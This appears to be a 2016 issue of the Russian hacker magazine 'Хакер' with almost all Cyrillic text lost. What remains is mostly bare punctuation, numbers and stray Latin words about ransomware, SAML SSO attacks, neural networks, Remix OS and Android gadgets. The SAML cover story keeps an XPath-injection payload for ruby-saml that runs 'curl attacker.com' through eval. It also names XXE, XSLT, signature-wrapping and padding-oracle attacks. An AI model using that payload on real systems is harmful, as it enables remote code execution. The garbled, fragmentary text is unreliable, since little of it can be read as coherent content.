Хакер

2016
205
SINGLE
SIGN-ON
-
SAML SSO
Cydia
Nmap
NSE

Android
Cover
Story
2016
205
MEGANEWS

Single Sign-On SAML

Remix OS Android

WWW2
-
NETFLIX
:
][
,
, !

IOS
Cydia-

Android
BLACKBERRY PRIV

#16.
EASY HACK

THERE IS NO 100% GUARANTEE

NMAP
NSE-
X-TOOLS

POWER OF COMMUNITY 2015:

?
GIT HOOK
-
ANDROID

MATERIAL DESIGN ANDROID
. , !
,
Java-!
BSD
1. Berkeley Software Distribution
IM
Tox Linux

Windows Server 2016

Docker
FAQ

Mifrill
nefedova.maria@gameland.ru

, . Linux.Encoder, Linux
( , ). 600 , :
Linux.Encoder, .
, , , , -, . AES-
, , Bitdefender . , Linux.Encoder.
Trend Micro : RANSOM_CRYPTEAR.B .
RANSOM_CRYPTEAR.B Hidden Tear , .
, Hidden Tear, , .
, -, : , . , ,
, .
Hidden Tear ,
GitHub.
, EDA2, Magic.
. EDA2 , .
, : , ( ) .
Magic
GitHub, 15
. , .
: Bleeping
Computer TeslaCrypt
( , ), .
TeslaCrypt :
,
.
, Bleeping Computer, Python GitHub.
Windows TeslaDecoder, TeslaCrypt .
TeslaCrypt 3.0, ,
- .
LeChiffre. Malwarebytes,
LeChiffre , :
,
Remote Desktop.
, :
Emsisoft ,
.
, Bleeping Computer.
(ESET, iSight,
Trend Micro )
.
2015
( - , )
.
, : ,
BlackEnergy. Sandworm,
SCADA- .
ESET
KillDisk (Win32/KillDisk),
2015 ( 2014 BlackEnergy Windows-
dstr, ). KillDisk 4000 .
: , Windows,
35 (, , )
.
BlackEnergy, ESET SSH- (Win32/SSHBearDoor.A trojan),
.
: , BlackEnergy,
SSH , . Sandworm.
BlackEnergy ,
.
, , ,
CERT UA. ,
.
ESET :

Excel . , , BlackEnergy, Gcat.
Gcat , Python.
.
ESET , , . ,
, .
29 . , SCADA-
BlackEnergy
, 2014 .
. ,
, DDoS-.
2014 -. 2015
Excel , Microsoft
Word:
20 2016 . FONTCACHE.DAT
BlackEnergy v2, 5.149.254.114 80- ,
. ESET,
.
, .
,

, ; 64- , .
, BlackEnergy
,
.
, .
,
. The
Jerusalem Post, , 25 ,
,
.
,
Shodan, . ,
Shodan . ,
Shodan
,
.
, Shodan
.

Shodan

WI-FI
IoT-,
. Wi-Fi- Ring
. Pen Test Partners
:
.
: ,
Ring , .
SSID .
, : Wi-Fi .
Pen Test Partners ,
. , .
334
5200

Cryptolocker
26- .
2013
, .
.
. 2013-
,
-, ( ),
. 199
7 10 ,
43 .
11 ,
135 .
,
? F-Secure ,
.
,
Cryptolocker, :
Bitcoin. ,
2,2
, 5200 . ,
, . . -,
, .
,
. .
WINDOWS 10
Microsoft Windows 10: Windows 7 8.1

. , , Microsoft Windows 7 8.1.
,
Kaby Lake Intel, 8996
Qualcomm Bristol Ridge AMD. Intel Skylake : Skylake Windows
7 8.1, 17 2017 .
123456
, . , , - password 123456.
SplashData ,
2015 , ,

-10

1
2
3
4
5
6
7
8
9
10

2014 .
123456
password
12345678 1
qwerty 1
12345 2
123456789
football 3
1234 1
1234567 2
baseball 2
123456:
, 2011 .
1234567890 qwertyuiop:

,
.
Baseball football:
- ,
.
Solo Starwars:
2015
,
.
Kaspersky Free :
-, , .
,
. .
, , , , . ,
: ,
Free,
-
, . ,
Kaspersky Free, , -, , .
Mifrill

Rutracker.org, . - 22 ,
, 25 , .
.
,
-
. ,
RuTracker.
-: ,
, .
.
, :
, , .
, . CHA-
. abuse- .
, -
.

, : , - . , ,
, . , ,
.
78 , .com. ,
.
, , -
, . ,
.

-
. , -
, : . .
, VPN,
-, .
crashsafari.com ( ) , iOS. ,
Safari:
Android. .
, , , .
, , :
.
. ,

- . , . , ,
, .
, , : .
,

MIT
: 40 000
. , , , Scratch.
scratch.mit.edu :
-, ,
, .
12 .
, ,
.
Scratch ,
, , , . , MIT ,
: ,
Scratch .

Cloudmark Vanson Bourne , 300 , 200 100 . , ,
1 600 000
1 470 000

.
84%
- ,

.
32%

- .
90%

email. 48% . 40%
.
25%
,

.
44%
IT-
. 43%

. 27%
.
56%
,
,
.
15

2016
.
, 27
1215
, , 94%
. , , : rutracker.org, bobfilm.net,
film.net, kinokubik.com, kinozal.tv, kinobolt.ru,
rutor.org, seedoff.net, torrentor.net, tushkan.
net, serial-online.net, wood-film.ru, kinovo.tv,
bigcinema.tv.
654

Apple
2015
, 2015
Adobe Flash Player.
CVE Details,
Apple,
654
. : 384 OS X 375 iOS. Microsoft
571 , 83 .
: Cisco 488 , Oracle 479 ,
Adobe 460 , Google 323 , IBM
312 , Mozilla 188 , Canonical
153 Novell 143 .

THE FAPPENING

2014 , The
Fappening Celebgate:
, ,
. , , .
,
.
( )
iCloud- , Apple. , Apple, . ,
.
COVERSTORY
SINGLE SIGN-ON
SAML
,
-
0ang3el@gmail.com
- SAML SSO.
Single Sign-On , -
(). SAML XML-
SSO. , SAML SSO, . ,
SAML IdP. ,
, . XXE,
, XPath-,
, XSW, assertions
. !
SAML SSO ?
Single Sign-On (SSO) ,
- -.
SSO :

. ,
( , , ).
, SSO-.
.
, .
:
,
.
SSO-,
. , SSO-: , ,
SSO- .
SSO- . - , .
, SSO,
.
Security Assertion Markup Language (SAML) ,
, ( ) .

(assertions), ( ).
SAML 2.0.
SAML (-) (assertions) XML.
, SAML w3c, XML:
Extensive Markup Language , XML;
XML Schema , XML-;
XML Signature c,
XML;
XML Encryption c, XML.
SAML :
Web SSO;
Attribute based authorization;
Identity Federation;
WS-Security.
Web SSO ( SAML SSO ) SAML, . .
SAML SSO :
(SAML identity Provider SAML IdP);
- (SAML Service Provider SAML SP);
(User Agent).
User Agent SAML IdP,
-. -
. SAML SSO
. 1.
. 1.
SAML SSO
IdP -,
OneLogin, Ping Identity, Okta . IdP,
Shibboleth OpenAM. ,
.
flow SAML SSO: SP-initiated flow IdPinitiated flow. , User Agent . SP-initiated
flow, . 2.
User Agent . , IdP Login URL. URL
SAML.
SAMLRequest (query string).
IdP Login URL c SAMLRequest. IdP ( Assertion Consumer URL ACS URL) SAML Response
, Response.
Response (assertions), (, , ). ACS URL SAML .
ACS URL SAML Response . Response assertion (, , assertion).
, SAML.
assertion , /app/profile
cookie .
. 2. SAML
SP-initiated flow
SAML SSO
, SAML SSO
. ,
SAML IdP (). OneLogin, ,
. OneLogin , . .
. APPS f Company
Apps, Add Apps.
SAML Test Connector, . 3. SAML Test
Connector (IdP w/attr).
. 3.
Save.
SAML IdP (. 4).
Issuer, ACS URL, Logout URL. , IdP.
. 4. SAML IdP
, , , . 5. ,
!
. 5.
SSO. X.509 certificate, Issuer URL,

SAML Endpoint SLO Endpoint (. 6).
. 6. SSO
IdP. Users f All

Users, . 7. New User.
. 7. IdP
, email . Applications (. 8).
. 8.
email,
IdP email.
SAML SSO .
,
IdP SAML 2.0 endpoint (.
OneLogin). IdP
ACS URL. SAML Response Base64 Response (. 9).
. 9. SAML Response
Response. (. 10):
. 10. URL decoding
, , XML Response,
IdP (. 11).
. 11. Base64 decoding
SAML Response IdP, Base64 Decode + Inflate Base64 Decode.

, SAML SSO .
!
SAML SSO

SAML SSO. ,
.
, , :
CODE/DECODE SAML;
SIGN SAML-, ;
VALIDATE SAML-;
ENCRYPT/DECRYPT
SAML-, ;
EXAMPLES SAML-.
-, , ,
Burp Suite. ,
SAML. Burp Suite.
SAML Editor, Python. , Jython standalone Burp
Extender Jython. ,
SAML, SAML-
(. 12). , ,
.
. 12.
SAML Editor
SAML Raider. Java, ,

Maven, jar-.
SAML Raider, : , assertions / SAML,
.
, SAML Raider,
XML Signature Wrapping (XSW).
XSW- (. . 13).
. 13. SAML Raider tab
SAML Raider Certificates, , assertions SAML-.

,
IdP . , SAML Raider,
Send Certificate to SAML Raider Certs, SAML Raider
Certificates Clone, IdP (. 14).
. 14. SAML Raider Certificates tab
, SAML SSO .

COVERSTORY
SINGLE SIGN-ON SAML
SAML SSO
SAML
SSO . .
XXE
SAML- XML. ,
,
XML. XML External Entities (XXE), Server-Side
Request Forgery (SSRF) XML Entity Expansion (XEE,
Billion Laughs attack).
, XML.
,
.
. , SAML-
, XML.
SAML SSO Response :
attacker.com , . , . HTTP/
HTTPS-.
attacker.com GET-, ,
.

XML () XML- .
<ds:Signature> <ds:Transforms>, <ds:Transform>. <ds:Transform>
.
:
Enveloped signature XML-, <ds:Signature>
, . enveloped signature ,
<ds:Signature>. <ds:Signature>;
C14N , XML- () (canonicalization) XML 1.0;
C14N11 XML 1.1;
XPath XPath-, ,
;
XSLT XML- .
SAML IdP . .
enveloped signature, 14N 14N11 , XPath XSLT .

.
, , XSLT-, , , , : (RCE), SSRF, , DoS, .
XSLT-.
XSLT. XSLT-
OWASP Switzerland 2015.
XML-,
. Response
<ds:Transform>, <xsl:stylesheet>.
. , XSLT , XSLT-:
attacker.com GET-, , XSLT.

, XSLT-
HTTP/HTTPS. XSLT-:
, XSLT
DoS-.
XSLT, XPath-, DoS-. ,
XPath-.
, XPath.
XPath-
XPath-. ,
SAML Response. , , <ds:Signature> <ds:Reference> URI.
URI XPath-, //*[@ID='aaa'],
<saml:Assertion>, .
XPath aaa .
URI
XPath- ,
XPath-.
XPath- 2015 ruby-saml. xml_security.rb, :
Ruby RCE.
XPath Ruby, shell . ruby-saml, URI :
#x'] or eval('`curl attacker.com`') or /[@ID='v
attacker.com GET-, .
SAML
IdP SAML Response
Base64. ,
.
Python, SAML Response
(Deflate + Base64) :
SAML-, , ,
DoS-.
. SAML Response.
<saml:Issuer>
Base64.

1000:1. , SAML Response
10 , 10 . , ,
-, , , - ~10 .
XML 10 .

SAML Response ,
, .
fail open .
, assertions, Response. .
, IdP
<ds:Signature> Response .

, .
IdP <ds:Signature>,
- ( Fingerprint).
. , IdP.
SAML , .

IdP . IdP
.
Response
assertions .
assertions .
Reply-. , assertion
( IdP), NotOnOrAfter,
Response .
, IdP . , MITM-
SAML Response,
. , ID SAML Response (, SAML assertion ) ,
.
XML Signature wrapping (XSW) .
.
, , SAML Raider.
XSW
XSW , ,
, . SAML ,
, .
, IdP assertion
. Response,
assertion . SAML Response . 15.
XPath
<saml:Assertion>, ID abc.
. 15. SAML Response
SAML Response. <samlp:Extensions>,

<saml:Assertion> . SAML <samlp:Extensions> .
<saml:Assertion ID = "abc"> <saml:Assertion
ID = "evil">. <saml:Assertion ID = "evil">
<saml:Assertion ID = "abc">.
SAML Response , . 16.
<saml:Assertion
ID = "abc">, <samlp:Extensions>.
.
<saml:Assertion ID = "evil">. XSW-.
. 16. SAML
Response
assertions
SAML assertions, assertion . SAML , assertion . SAML Response assertion . Response
<saml:Assertion> <saml:EncryptedAssertion>, Base64 assertion,
, <xenc:CipherData>.
RSAES-PKCS1-v1_5. (AES) CBC.
assertion
(Oracle), , padding XML.
. assertion
padding , . , assertion,
.
XML-:
. , .
,
.
(Juraj Somorovsky) ,
XML-. ,
: .
( AES 16
) 162 .
2015 Black Hat EU WS-Attacker,
XML-. .
.
assertion , . 17.
, AES-CBC ( 16
). i- Pi :
Pi = Ci-1"D(k,Ci) = Ci-1"x. Ci-1 i-1 , Ci
i . AES D(k,Ci), x.
. 17.
assertion

, XML-.
, XML <ABC/>. XML UTF-8.
XML (6 ) 0x3c 0x41 0x42
0x43 0x2f 0x3e. AES 16 .
10 0x3c 0x41 0x42 0x43 0x2f 0x3e
0x?? 0x?? 0x?? 0x?? 0x?? 0x?? 0x?? 0x?? 0x?? 0x0A (0x?? ). ( 0x0A ).
, Ci ( ).
0 i: C0, ..., Ci. Ci-1
SAML Response .
Ci-1, XML
( 0x01).
Ci-1 C~i-1.
. 18.
C(i-1)
C~i-1, Pi ( Pi[16])
( ). x[16] (
x[16] = 0x01C~i-1[16]. Pi[16] = 0x01C~i-1[16]Ci-1[16].
( 1- 15-). , Pi[3].
( XOR) C~i-1[3] ( )
XML . ,
, Pi[3].
, , SAML SSO. , SSO SAML , SAML SSO.

, , SAML SSO, ,
. !
PC ZONE

paramonov@sheep.ru
, . , , ,
, .
,
IBM.
, ,
. , .
. ,
, . . ,
.
, ,
, .
Caenorhabditis elegans ,
, . !
250 , , , .

,
, . , , - . .
Mark I Perceptron.
,
. Mark I : 400 , .
, , , . , , , . 512
, .
, . , , .
. , .
.
, ,
. ,
. .

, .
.
. .
,
, .
.
. . .
.

. ,
.
. , (
) , , ,
. .
,
.
,
. Python Numpy ( Numpy, Numpy
). .
.
Hello World MNIST, 60 ,

, , . - : . .
, :
, . (, , )
. syn1 syn2: ,
.
. , Numpy: , numpy.random.
random, , .
, .
, 60 , .
l0 , . . l1 . ,
(l0)
(syn0), . l2 .
, l1 l0 syn1 syn0.
: , .
, l2, . ,
, . ,
, ,
.
(l2) (y), . l2_delta
. , , .
(l1). .
(syn1), .
, , , : .
. ,
,
. (backpropagation).
,
, copy-paste,
. -, ,
,
.
Python,
, . Pybrain, .
. , , : ,
, .

, ,
. ,

.
, .
,
.
, ,
. . ,
.
,
, , . ,
.
. (, ) . ,
, .
. , , , .
, , , ,
,
.
(pooling),
. -,
, ,
(max pooling). , , ,
. , , .

, .
Pybrain,
, ,
classify_image.py, TensorFlow,
Google. ,
ImageNet.
.
$ python classify_image.py --image_file cow.jpg
,
. classify_image.py , . , ,
, .
, ,
, .
( 64%), (5%) (4%). , ,
, .

, , , . Google -
- Google Cloud Vision API, , , .
AlchemyAPI, IBM,
. ,
alchemyapi.com . REST: URL gateway-a.watsonplatform.net, HTTP-,
XML JSON.
. AlchemyAPI : URLGetRankedImageKeywords
ImageGetRankedImageKeywords. , POST. .
>>> pprint.pprint(call_api('http://gateway-a.watsonplatform.net/

calls/url/URLGetRankedImageKeywords',

url='http://goo.gl/I9ytWA', apikey=apikey, outputMode='json'))
{u'imageKeywords': [{u'score': u'0.985226', u'text': u'animal'},
{u'score': u'0.964429', u'text': u'cow'},
{u'score': u'0.598688', u'text': u'cattle'},
{u'score': u'0.5',
u'text': u'farm'}],
u'status': u'OK',}
AlchemyAPI ( ). IBM :
, . , : URLGetRankedImageFaceTags ImageGetRankedImageFaceTags.
.
>>> pprint.pprint(call_api('http://gateway-a.watsonplatform.net/

calls/url/URLGetRankedImageFaceTags',

url='http://goo.gl/Jh34qd', apikey=apikey, outputMode='json'))
JSON . IBM
, ,
: , , ,
, .
!
AlchemyAPI .
, : 0,75 . , . , , .
PC ZONE
REMIX OS
ANDROID
Remix OS Android ,
. ,
, . ?

paramonov@sheep.ru
, Remix OS .
Jide Technology, Google. , , . Jide Technology Apple, Google. , ,
Apple, . , Remix OS
, .
Jide Technology 2015 .
Kickstarter Remix Mini , 70 . ,
Remix Mini , . x86 ARM, Remix Mini Android.
, Remix Mini -. Jide Technology

Ultratablet -, , iPad Pro
Microsoft Surface.

Remix OS ? , Jide
Technology
. , Android, . Remix OS
Remix Mini
Ultratablet. , .
Remix OS
Android-x86,
Android, . Remix OS Android-x86 , Remix OS .
, , .
, Remix
OS Windows . USB-. ,
, (
, EFI ). . , USB 3.0. .
. Windows
. . . ,
Remix OS.

. Live CD.
,
.
. , .
,
Remix OS . , , . VirtualBox .
. Remix OS ,
, , .
Remix OS ,
, .
Windows 10. , OS X.

, Command.
, , . ,
. Win
.
: , , . Android Remix
OS . ,
.
, .
,
. , . ,
. , .
Windows.
, : , , Bluetooth
Wi-Fi, . .
, Windows, . OS X. ,
. Remix OS ,
. .
, , , .
Windows:
,
. , ,
, . Windows

. Remix
OS , , .
, . , .

, , ,
, Windows.
, Remix OS . , ,

. ,
. ,
.
, .
.
, Android , . Remix
OS ,
. , , . , .
.
Remix OS
. ,
, , , , . ,
. - , .
. , Remix OS 140 , .
.
,
, . Remix OS , ,
.

. , .
, Remix OS, .
Android,
MX Player. ,
, ,
, , Dashboard.
. .
Remix OS . , , ,
. Finder, :
, .
Remix OS Google, Play Store.

, , .
,
, Play Store , . -
.
, Play Store .
APK,
. , , :
, , .

, - ,

,
Remix OS.
VLC,
.

. , , Minecraft.
.
, . Remix OS
. , .
, Android .
Remix OS , , .
, , Android, : ?
Android? , Windows. , OS X.
Linux. , Remix OS , , Play
Store, , ? ?
? .
PC ZONE

. ,
, : , , .
,
.
84ckf1r3
84ckf1r3@gmail.com

,
, . : , , .
,
. . . , : , , ,
, , .
Adblock Edge

.
, ,
, .

, Google,
, . , ,
, ,
. ,
, , IP-.

ID . , , . , URI (. Chrome: Adblock).
TrackMeNot (TMN) Firefox Chrome, -
JavaScript, C++ XUL.
, . , .
TrackMeNot
.
:
( RSS ), . , TMN ,
.
TMN
burst-mode , .
Google (
, , IP- ).
burst-mode,
(, ).
TMN IP

. . AdNauseam
(. ) Firefox,
.
AdNauseam
Adblock
AdNauseam . , . Adblock,
AdNauseam . ,
.
Adblock . v. 2.6.11 Adblock Plus , Edge . :
Adblock Plus, .
AdNauseam
Adblock
Plus 2.6.11
AdNauseam .
, .

. page-worker API Mozilla Firefox.
AdNauseam

TrackMeNot AdNauseam . , . ,
.
. TrackMeNot
. RSS ,

WWW
. AdNauseam
- ,
. ,
AdNauseam drive-by- . , -

,
AdNauseam GitHub
.

. - TrackMeNot
, NYU
.
PC ZONE

apismenny@gmail.com
SEEDR
www.seedr.cc
Seedr -
, , ,
-
-. Seedr : ,
.
, - - .
, , StreamNation,
: . (
), .
-, Seedr -: , . , .
-, Seedr ,
- , , ( ,
,
; ). , .
Seedr
Chrome. ,
Add to Seedr.
Kodi ( XBMC) Seedr API
.
, .
100 10 , 250
15.
GUESSTIMATE
www.getguesstimate.com
Guesstimate
( , )
. ,
, ,
. , - , ? - Excel?
Guesstimate .
Guesstimate ,
, . ,
, , -
. , , ,
.
, , ( , [1,100]), , Excel, , .

, . Guesstimate
.
, , . ,
-: Guesstimate 5000 ,
.
Guesstimate c .
, ,
. Guesstimate
Public
Models ( Test).
.
SSL SERVER TEST SECURITYHEADERS.IO
securityheaders.io
SSL Server Test SecurityHeaders.io

, . ,

HTTP, . , ,
.
SecurityHeaders.io , .
, , . :
, Scan
, , . , X-XSSProtection ,
XSS, Strict-Transport-Security (HSTS) MITM.
SSL Server Test, Qualys SSL Labs, SSL .

.
(
F A+).
,
.
NETFLIX

apismenny@gmail.com
: , , , , .
, , .
:Netflix and chill.
,
: , , , . :
, Google , Netflix
... , , , . , ;
.
Netflix .
70 ; , , . : ( 12 34 )
30%, - .
Netflix , .
-, ,
, ? , , .
,
(- ), ,
.
. Netflix big
data, .
, , SMS
( SMS).
, ,
. , Netflix
- 800 . .
.

,
, , . :
, .
2008 . Joost, .
,
KaZaA Skype. Joost
: , ,
. , Joost , , 2012 . : Joost
, .
Joost Torrent. - .
, - , , ,
. .
.
Popcorn Time
2014 . Netflix , . , ,
, The Pirate Bay.
, Play . .
Popcorn Time, . Netflix
, . : , ( Popcorn
Time ) YIFY, ( yts.ag, , , ).
, , - . ,
?
Popcorn Time ,
?
: , .
The Pirate Bay ,
.
-

, . , ,
. Netflix
INFO
,
.
Netflix

,
, , ( )
:
, ,

. ,
IP .
, DVD
.

:
, DRM .

. , , .
,

,
TPB
.
,

-,

. , -
,
. , The Pirate Bay , :
, , .
,
. ?
: ,
?
, . ,
, .
, . , , . , ,
. ,
, :
.

5 10 ( 6 ). Lost ( ) 4 , Breaking Bad ( ) 3 .
, , - ,
.
? :

5,7 ( ). , , . , -,
, , -, ,
( , , 90 ).
, ,
. , , 100 ,
Pixar .
, , ,
-, ( - ), -, , , . , ,
, :
?
,
.
, .
, , . : , , , . ,
.
MOBILE
][

zobnin@gmail.com
,
X-Mobile , ,
Android , ,
. ,
, , ][,
. Blackphone
CyanogenMod.
INTRO
, , ][.
, . :
1. , , (
)?
2. -5 ,
.
, , . !
, , , - . ,
, , , .
DR. ,
, MALWARE
Sony Xperia Z3 Compact.
Samsung Galaxy Nexus
, . , (4,6)
(1280 720, HD).
( , ). ,
Sony ,
, . , CyanogenMod Cyanogen
.
iPad 2 ().
, ,
.
, Pipo M1, .
, , , , .
... , , Android + Windows 10,
, , ,
- .
- ( ;). , GPS,
, , . -
.
Xiaomi Mi Band,
, .
(
, , ), . .
, 7:00 ,
6:45 , , ... , .

, FBReader
( , ), Dr.Web (),
World Newspapers ( ), , , .
,

: ,
. ,
, , .
,
. Xenium Philips.
Philips Xenium X1560, ,
Philips Xenium 9@9q (, , ).
( ),
. , ( , ,
, , USB-, , ), iPad 2 . iPad 2 , ,
. .
iPad Air 2.
, iPad:
1. MAPS.ME -, .
.
2. Hotspot Shield VPN: VPN iPad. ,
SurfEasy VPN.
3. Panic Prompt 2 SSH-. VPN .
4. Textastic . ,
MD-, .
5. Dropbox ,
.
, -,
PC ZONE
. iPhone 6, iPad
, Apple Watch .
:
Inbox , ,
.
.
, - , .
Byword , , . Markdown,
iCloud, . iA Writer, .
Things ,
. GTD, . ,
Wunderlist ( - ).
Reeder , RSS iOS OS X. Inoreader
, .
Soulver :
. ,
, , , .
( ) Angstrom
.
, . Tweetbot
( )
.
, UNIXOID,
SYN/ACK, X-TOOLS
Nexus 5,
Nexus 4, . Android ,
. . Nexus 6
,
. , Nexus
5, .

Nexus 4. Samsung
Galaxy Tab P1000 Android- . , ! . ,
- ,
. /// .
, :
Asana - ][;
Evernote , ,
;
Feedly RSS, Google;
Google Sky Map , , , , , .
,
X-MOBILE
, ,
OnePlus One. , Nexus
5X, 250 , ,
CyanogenMod (,
Cyanogen
OS) . (
) - .
, - Qi- , Nexus 4,
:(.
,
Motorola Defy
MIUI.
,
. ,
. iPhone
iOS , , .
, , , , Omate TrueSmart.
. Android- c SIM-, GPS - .
, , / :).
, -5 :
1. Action Launcher
: Cover :
, ,
.
2. Pocket -. Chrome/
Firefox ,
, Pocket ,
. 90% .
3. FeedMe RSS- Feedly.
.
4. MultiBoot Manager . Must have .
5. Dropsync Dropbox-
( Dropbox),
.
,
][
iPhone 6 iPad mini 2.
Android- Nexus 5 Nexus 7.
iPhone iPad. Android , , Android iOS,

, . Apple.
Android- , .
iOS :
1. . , iOS ,
,
Android. , App Store,
.
VPN
iOS .
2. . iOS- , Android-. Google, Apple . App Store
, ( ).
3. . iOS , Android .
, . , Android Tasker,
- , .
, .
, .
. -, .
OS/.
, :).
:
1. OpenVPN. VPN-, OpenVPN Access
Server AWS. , .ovpn. Must have road warriora.
2. 1Password. . 1Password. , , , , , .
3. Parallels Access. . : , ,
, , Gaming Mode! , ,
.
4. Slack, Asana. , -. ,
. ,
Asana. , , , . ,
, .
5. vSSH. SSH-. , iTunes, , passphrase, . :

F112, Tab, . , , .

, , *nix
, iPad 2
. ,
, iPad.
, X-mobile , , .
, ,
. . , , ,
. , , Palm
, ,
.
.
MOBILE
BRADA
john.brada.doe@gmail.com
Google , .
/, Google Play Services ,
.
,
Now on Tap, , , Tasker.
, .

Nexus. , Google
Now, . Google Now,
Google , Google.

Google Android-.

(
). Google ,
( Ok, Google).
Android 4.4 , ,

( ).
, , . , MOTO X
,
,
.

, , Google Now.
, , , . , : , Google,
?, .
?, . Google
Now , .
/ #_ #_
. Google Maps .
, , .
. . ,
, , , .
, .
/ , . WhatsApp, Viber
.
# # #. : WhatsApp . .
. , . / ( -),
.

. Google-.
, .
, ( ) .
.
.
.
/ () # #.
Play Music YouTube.
, ,
, .
/ / . .
, .

. Google Keep.
NOW ON TAP

Android 6.0 Marshmallow. . - .
Now.
? Now, Google
, , . ,
, ,
,
. Google . , ,
, . , Facebook Twitter- ,
. .
, , YouTube .
Now on Tap
GOOGLE
, . , . ,
.
Do a barrel roll.
Make me a sandwich!
Sudo make me a sandwich!
When am I?
Beam me up, Scotty!
Up up down down left right left right.
What does the fox say?
TASKER
, , , Google Now
.
Tasker AutoVoice.
: , , , ,
, , media,
HTTP Get Post , . , . .
Google Now Integration
AutoVoice. . ,
. . Event f Plugin f AutoVoice Recognized. :
Command Filter ,
: . Speak Filter,
.
Exact Command ,
,
.
Use Regex .
. (|) (|) ,
, ,
.
Audio f Ringer Volume Audio f Notification Volume.
Alert f Flash Text .
Google Now,
.
. App f Go Home. , Alert f Say , .
.
, AutoRemote,
Android. EventGhost, .
,
. (Joao Dias), Auto*-,
,
Cortana .

. ,
, , . , , , ,
. .
Open Mic+ for Google Now
Ok, Google
. ,

Google Google
Engine, PocketSphinx.

,
,
.

.
( )
. MOTO X, , , ,
,
Android . Bluetooth-,
,
.
Commandr for
Google Now
Open Mic+. Google
Now . : /
, /
, / , /gmail ( ), <>, , ,
.
, , .
/ ,
, . .
, Task. Xposed, Commandr
Android Wear.
Open Mic+ for Google Now
Commandr for Google Now

,
, . Tasker, ( ),
( , )
. - , . .
Commandr, Google Now,
, , ,
. , , ,
. 25 , .
, ,
, , ,

. , , .
MOBILE
IOS
CYDIA-

mfilonen2@gmail.com
, iOS- ,
Cydia.
: - , -
, -
, .
, .

, ,
. , -,
iOS.
MyRepoSpace. , . ,
, It was fun
. YouRepo.

YouRepo
YouRepo
, , .
. :
, , .
, . , .
YouRepo ?
, , CMS
. ,
,
. , , . , ,
, , .
IOS
iOS-. iRepo, 2 ( ,
). , .
,
/private/var/mobile/iRepo. ,
.
iRepo
iRepo
iRepo . -, ,
iOS. -, , .
.

, ( , ) Ubuntu Debian ( Cydia . .
.). Linux ,
.
.
: Release Packages. , , . ,
Packages,
. ,
(
). , Packages Release.
Release , , .
. :
Origin: ;
Label: . Cydia;
Version: ;
Architectures: iphoneos-arm;
Components: main;
Description: .
, , . ,
. :
UTF-8, Cydia . .
Packages, Release, . : , , , . Packages
, :
Name: , ;
Size: . ;
Maintainer: ;
Section: , . Tweaks, Themes, Games, . .
, ;
Author: ;
Version: ;
HomePage: ;
Architecture: iphoneos-arm;
Package: , ,
;
Filename: , (/ ,
/dir );
Description: ;
MD5Sum: MD5,
. .
,
.
: Depends ( ), Pre-Depends ( ), Conflicts ( ).
. ,
UTF-8.
Release
Packages

Section
MD5 . Mac,
Windows. , OS X MD5
, . , md5,
. , MD5 Mac
-r.
Windows WinMD5Free . .
Packages Release
Packages. Windows gz- 7-Zip.
Mac : gzip -f -k
Packages.
, : Packages,
Packages.gz, Release deb- , Packages.
,
, FTP
.
. INFO
MySQL PHP
- Apache. Mac Apache (2.4.16
)
, Depiction
OS X.
/DEBIAN/control sudo apachectl start
deb-. .
,
localhost
Packages,
It works!. ,
localhost/ .
, /Library/
Maintainer Author
WebServer/Documents.
Packages-
Apache Windows .
<>,
.
.

Packages.
.msi apache.org.
Cydia
( localhost).
,
Program Files.
.
conf httpd.conf,
,

( ServerName)
Cydia.
,
( DocumentRoot).
htdocs
MD5Sum
,
,
, .
,
Apache .
,
, .
.

,
, . . -,
Packages Packages.gz
, .
-, Packages.gz
Packages.
. ,
gzip -f -k ,
deb-. , , Cydia.
,
Packages .
,
Cydia .
INFO
Linux dpkg
scanpackages -m,
Packages
, deb- .
Fink Mac,
XCode Command Line
Tools Java.

Packages, ,

.

,
. 59 59 72 72
PNG CydiaIcon. . Cydia ,
.

, . , .
, HTML-,
Depiction.
Depiction Packages
Depiction: HTML- .
Depiction Description .
, , Cydia
, , .
300 .
Depiction Cydia ,
-. PHP, HTML, CSS, JavaScript, -
.
, .
,
. . , , , ,
BigBoss ModMyi.

Packages, , , , Packages.
, .
, OS X,
. GitHub . MD5,
cURL, . , AppleScript Editor.
,
default answer. / , .
,
, .
WWW
.
YouRepo
? , , .
, , .
MD5
WinMD5Free
BigBoss
ModMyi
MOBILE

rommanio@yandex.ru

ANDROID
Google
.
Android ,
,
,
, , .
: , , .
IoT . 2005
( ) ;
.
, , UPnP.
Android, ,
.
, Samsung
Android. Samsung
Android, ,
Nikon.
. Google
, .
.
,
( ) , -, . , , ,
, Nikon, 2012- - Android 2.3. , , Samsung.
Samsung Galaxy Camera
Nikon Coolpix S800c
, Samsung
,
. , Exynos 4412, , ARM Cortex A9, Android,
Expeed C2.
. Samsung Galaxy Camera Android 4.1 TouchWiz, ,
.
GSM-, (
Skype). Android. ,
, .
Nikon Android 2.3. , ,
Android,
: Samsung Android,
, Nikon ,
. Android , GSM-
, Wi-Fi GPS. ( ) , .
B , , Samsung
Android , .

, ,
, .
Android Android TV.

, - . Android
5 , Google Play,
, Netflix Kodi ( XBMC),
.
,
: activity action.Main LEANBACK_LAUNCHER, , Android TV,
, D-pad. ,

.
Sony 55W807C :
16 ;
72 ;
JPG 92 .

Sony
Android TV ,
. ,
, .

! Android . . ( Touch
Revolution) CES 2010. Android , , 2013 CES
Dacor.
Android
SectorQube. MAID,
Make All Incredible Dishes, Microwave Android Integrated Device.
MAID , ,
, (,
) , Wi-Fi.
. , (, , ).
, . ,
, , .
( ) , Kickstarter, . 125145 .
MAID,

Dacor
Dacor. -. Samsung SSPV210 1 , Cortex

A8. 512 DDR2, - 16 .
SD-. , Wi-Fi Bluetooth. Android
4.0.3. : 4500 7500 .

Android Samsung. ,
2012 , 10,1- , ,
Epicurious
Evernote ( ) , .
,
(, , Android ). , CES
2016, 21 1080.
,
(
), , ,
,
, , ,
. ,
!
- ,
.
-, ,

, , ...
Seraku
2012 . , , . , , .
,
. , Android.
Android
, , , .
REMIX MINI
.
, - Google. -,
,
HDMI, . . 12,6 x 8,8 x 2,6
. 64- Cortex A53, 1,2 .
( , ) 1 2 8 16 . ( HDMI) :
2 USB 2.0;
Ethernet;
;
microSD.
, Wi-Fi, 5 .

Android, Remix OS. ( ) , , (, / ),
, ( ) , ,
Google Play.
-
Remix Mini
Kickstarter.
, . Remix
OS .
Android Wear Android

. Omate Umeox.
Omate Truesmart Kickstarter. , . :
1,54 ;
100 ;
MediaTek MT6572 (1,3 );
512 1 ;
- 4 8 ;
GSM/3G/Wi-Fi/Bluetooth;
600 ;
Android 4.2.2.
Android,
. . - . (5 ) ,
,
. , ,
, .
-.
, Google , Google Play
.
, , ,
.
APK. 250/300 . Omate

Android 5.1 .
